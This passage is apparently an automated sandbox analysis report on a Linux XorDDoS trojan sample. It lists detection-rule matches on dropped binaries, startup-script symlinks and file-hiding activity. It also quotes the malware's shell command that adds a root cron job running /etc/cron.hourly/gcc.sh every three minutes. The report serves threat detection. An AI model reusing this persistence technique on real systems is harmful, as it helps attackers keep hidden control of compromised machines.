            Source: /usr/bin/sosfbbrzmx, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/sosfbbrzmx, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/uhjkqkcgma, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/uhjkqkcgma, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/uhjkqkcgma, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/vnihfmehfy, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/vnihfmehfy, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/vnihfmehfy, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/oigyzaiygp, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/oigyzaiygp, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/oigyzaiygp, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/otlzwyqefc, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/otlzwyqefc, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/otlzwyqefc, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/ksagqhmoao, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/ksagqhmoao, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/eqoogeqyds, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/eqoogeqyds, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/ksagqhmoao, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/eqoogeqyds, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/wutujskjnm, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/wutujskjnm, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/wutujskjnm, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/qxzsiorokf, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/qxzsiorokf, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/qxzsiorokf, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/gphlkawhxw, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/gphlkawhxw, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/gphlkawhxw, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/uzqdvpyngy, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/uzqdvpyngy, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/uzqdvpyngy, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/lib/libudev.so, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/lib/libudev.so, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/lib/libudev.so, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/snluqxjnyb, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/snluqxjnyb, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/jeyjdycnpv, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/jeyjdycnpv, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/jeyjdycnpv, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/bgoiqqymph, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/bgoiqqymph, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/bgoiqqymph, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/dthtwwmqvu, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/dthtwwmqvu, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/dthtwwmqvu, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: classification engineClassification label: mal100.troj.evad.linELF@0/21@5/0
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)/run/gcc.pid: pdtdvfdbumvoldufbmfvvwvyzmhpzexqJump to behavior

            Persistence and Installation Behavior

            barindex
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /etc/rc1.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elfJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /etc/rc2.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elfJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /etc/rc3.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elfJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /etc/rc4.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elfJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /etc/rc5.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elfJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /etc/rc.d/rc1.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elfJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /etc/rc.d/rc2.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elfJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /etc/rc.d/rc3.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elfJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /etc/rc.d/rc4.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elfJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /etc/rc.d/rc5.d/S90UDMp3dZ7nc.elf -> /etc/init.d/UDMp3dZ7nc.elfJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /etc/cron.hourly/gcc.shJump to behavior
            Source: /bin/sh (PID: 6266)File: /etc/crontabJump to behavior
            Source: /bin/sed (PID: 6267)File: /etc/crontabJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6266)Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"Jump to behavior
            Source: /sbin/update-rc.d (PID: 6271)Systemctl executable: /bin/systemctl -> systemctl daemon-reloadJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)Reads from proc file: /proc/statJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)Reads from proc file: /proc/meminfoJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)Reads from proc file: /proc/cpuinfoJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/lib/libudev.soJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/oigyzaiygpJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/sosfbbrzmxJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/gphlkawhxwJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/vnihfmehfyJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/eqoogeqydsJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/otlzwyqefcJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/dthtwwmqvuJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/jeyjdycnpvJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/wutujskjnmJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/qxzsiorokfJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/uzqdvpyngyJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/bgoiqqymphJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/uhjkqkcgmaJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/ksagqhmoaoJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File written: /usr/bin/snluqxjnybJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)Writes shell script file to disk with an unusual file extension: /etc/init.d/UDMp3dZ7nc.elfJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)Shell script file created: /etc/cron.hourly/gcc.shJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /etc/init.d/UDMp3dZ7nc.elfJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/oigyzaiygpJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/sosfbbrzmxJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/gphlkawhxwJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/vnihfmehfyJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/eqoogeqydsJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/otlzwyqefcJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/dthtwwmqvuJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/jeyjdycnpvJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/wutujskjnmJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/qxzsiorokfJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/uzqdvpyngyJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/bgoiqqymphJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/uhjkqkcgmaJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/ksagqhmoaoJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/snluqxjnybJump to dropped file
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/oigyzaiygpJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/sosfbbrzmxJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/gphlkawhxwJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/vnihfmehfyJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/eqoogeqydsJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/otlzwyqefcJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/dthtwwmqvuJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/jeyjdycnpvJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/wutujskjnmJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/qxzsiorokfJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/uzqdvpyngyJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/bgoiqqymphJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/uhjkqkcgmaJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/ksagqhmoaoJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/snluqxjnybJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/rfdcbxuezdJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/nqjbkvhnccJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/xzmsvqaqizJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/bbdupdfrblJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/lqmgtequuzJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/vzezokfaskJump to behavior
            Source: /tmp/UDMp3dZ7nc.elf (PID: 6261)File: /usr/bin/skjzlhozvlJump to behavior
            Source: /usr/bin/oigyzaiygp (PID: 6295)File: /usr/bin/oigyzaiygpJump to behavior
            Source: /usr/bin/oigyzaiygp (PID: 6299)File: /usr/bin/oigyzaiygpJump to behavior
            Source: /usr/bin/oigyzaiygp (PID: 6304)File: /usr/bin/oigyzaiygpJump to behavior
            Source: /usr/bin/oigyzaiygp (PID: 6306)File: /usr/bin/oigyzaiygpJump to behavior
            Source: /usr/bin/oigyzaiygp (PID: 6307)File: /usr/bin/oigyzaiygpJump to behavior
            Source: /usr/bin/sosfbbrzmx (PID: 6313)File: /usr/bin/sosfbbrzmxJump to behavior
            Source: /usr/bin/sosfbbrzmx (PID: 6318)File: /usr/bin/sosfbbrzmxJump to behavior
            Source: /usr/bin/sosfbbrzmx (PID: 6321)File: /usr/bin/sosfbbrzmxJump to behavior
            Source: /usr/bin/sosfbbrzmx (PID: 6324)File: /usr/bin/sosfbbrzmxJump to behavior
            Source: /usr/bin/sosfbbrzmx (PID: 6325)File: /usr/bin/sosfbbrzmxJump to behavior
            Source: /usr/bin/gphlkawhxw (PID: 6330)File: /usr/bin/gphlkawhxwJump to behavior
            Source: /usr/bin/gphlkawhxw (PID: 6337)File: /usr/bin/gphlkawhxwJump to behavior
            Source: /usr/bin/gphlkawhxw (PID: 6340)File: /usr/bin/gphlkawhxwJump to behavior
            Source: /usr/bin/gphlkawhxw (PID: 6341)File: /usr/bin/gphlkawhxwJump to behavior
            Source: /usr/bin/gphlkawhxw (PID: 6342)File: /usr/bin/gphlkawhxwJump to behavior
            Source: /usr/bin/vnihfmehfy (PID: 6366)File: /usr/bin/vnihfmehfyJump to behavior
            Source: /usr/bin/vnihfmehfy (PID: 6371)File: /usr/bin/vnihfmehfyJump to behavior
            Source: /usr/bin/vnihfmehfy (PID: 6374)File: /usr/bin/vnihfmehfyJump to behavior
            Source: /usr/bin/vnihfmehfy (PID: 6377)File: /usr/bin/vnihfmehfyJump to behavior
            Source: /usr/bin/vnihfmehfy (PID: 6378)File: /usr/bin/vnihfmehfyJump to behavior
            Source: /usr/bin/eqoogeqyds (PID: 6385)File: /usr/bin/eqoogeqydsJump to behavior
            Source: /usr/bin/eqoogeqyds (PID: 6389)File: /usr/bin/eqoogeqydsJump to behavior
            Source: /usr/bin/eqoogeqyds (PID: 6393)File: /usr/bin/eqoogeqydsJump to behavior
            Source: /usr/bin/eqoogeqyds (PID: 6396)File: /usr/bin/eqoogeqydsJump to behavior
            Source: /usr/bin/eqoogeqyds (PID: 6397)File: /usr/bin/eqoogeqydsJump to behavior
            Source: /usr/bin/otlzwyqefc (PID: 6402)File: /usr/bin/otlzwyqefcJump to behavior
            Source: /usr/bin/otlzwyqefc (PID: 6407)File: /usr/bin/otlzwyqefcJump to behavior
            Source: /usr/bin/otlzwyqefc (PID: 6412)File: /usr/bin/otlzwyqefcJump to behavior
            Source: /usr/bin/otlzwyqefc (PID: 6413)File: /usr/bin/otlzwyqefcJump to behavior
            Source: /usr/bin/otlzwyqefc (PID: 6414)File: /usr/bin/otlzwyqefcJump to behavior
            Source: /usr/bin/dthtwwmqvu (PID: 6419)File: /usr/bin/dthtwwmqvuJump to behavior
            Source: /usr/bin/dthtwwmqvu (PID: 6424)File: /usr/bin/dthtwwmqvuJump to behavior
            Source: /usr/bin/dthtwwmqvu (PID: 6427)File: /usr/bin/dthtwwmqvuJump to behavior
            Source: /usr/bin/dthtwwmqvu (PID: 6430)File: /usr/bin/dthtwwmqvuJump to behavior
            Source: /usr/bin/dthtwwmqvu (PID: 6431)File: /usr/bin/dthtwwmqvuJump to behavior
            Source: /usr/bin/jeyjdycnpv (PID: 6437)File: /usr/bin/jeyjdycnpvJump to behavior
            Source: /usr/bin/jeyjdycnpv (PID: 6442)File: /usr/bin/jeyjdycnpvJump to behavior
            Source: /usr/bin/jeyjdycnpv (PID: 6445)File: /usr/bin/jeyjdycnpvJump to behavior
            Source: /usr/bin/jeyjdycnpv (PID: 6448)File: /usr/bin/jeyjdycnpvJump to behavior
            Source: /usr/bin/jeyjdycnpv (PID: 6449)File: /usr/bin/jeyjdycnpvJump to behavior
            Source: /usr/bin/wutujskjnm (PID: 6454)File: /usr/bin/wutujskjnmJump to behavior
            Source: /usr/bin/wutujskjnm (PID: 6459)File: /usr/bin/wutujskjnmJump to behavior
            Source: /usr/bin/wutujskjnm (PID: 6462)File: /usr/bin/wutujskjnmJump to behavior
            Source: /usr/bin/wutujskjnm (PID: 6465)File: /usr/bin/wutujskjnmJump to behavior
            Source: /usr/bin/wutujskjnm (PID: 6466)File: /usr/bin/wutujskjnmJump to behavior
            Source: /usr/bin/qxzsiorokf (PID: 6473)File: /usr/bin/qxzsiorokfJump to behavior
            Source: /usr/bin/qxzsiorokf (PID: 6478)File: /usr/bin/qxzsiorokfJump to behavior
            Source: /usr/bin/qxzsiorokf (PID: 6480)File: /usr/bin/qxzsiorokfJump to behavior
            Source: /usr/bin/qxzsiorokf (PID: 6484)File: /usr/bin/qxzsiorokfJump to behavior
            Source: /usr/bin/qxzsiorokf (PID: 6485)File: /usr/bin/qxzsiorokfJump to behavior
            Source: /usr/bin/uzqdvpyngy (PID: 6490)File: /usr/bin/uzqdvpyngyJump to behavior
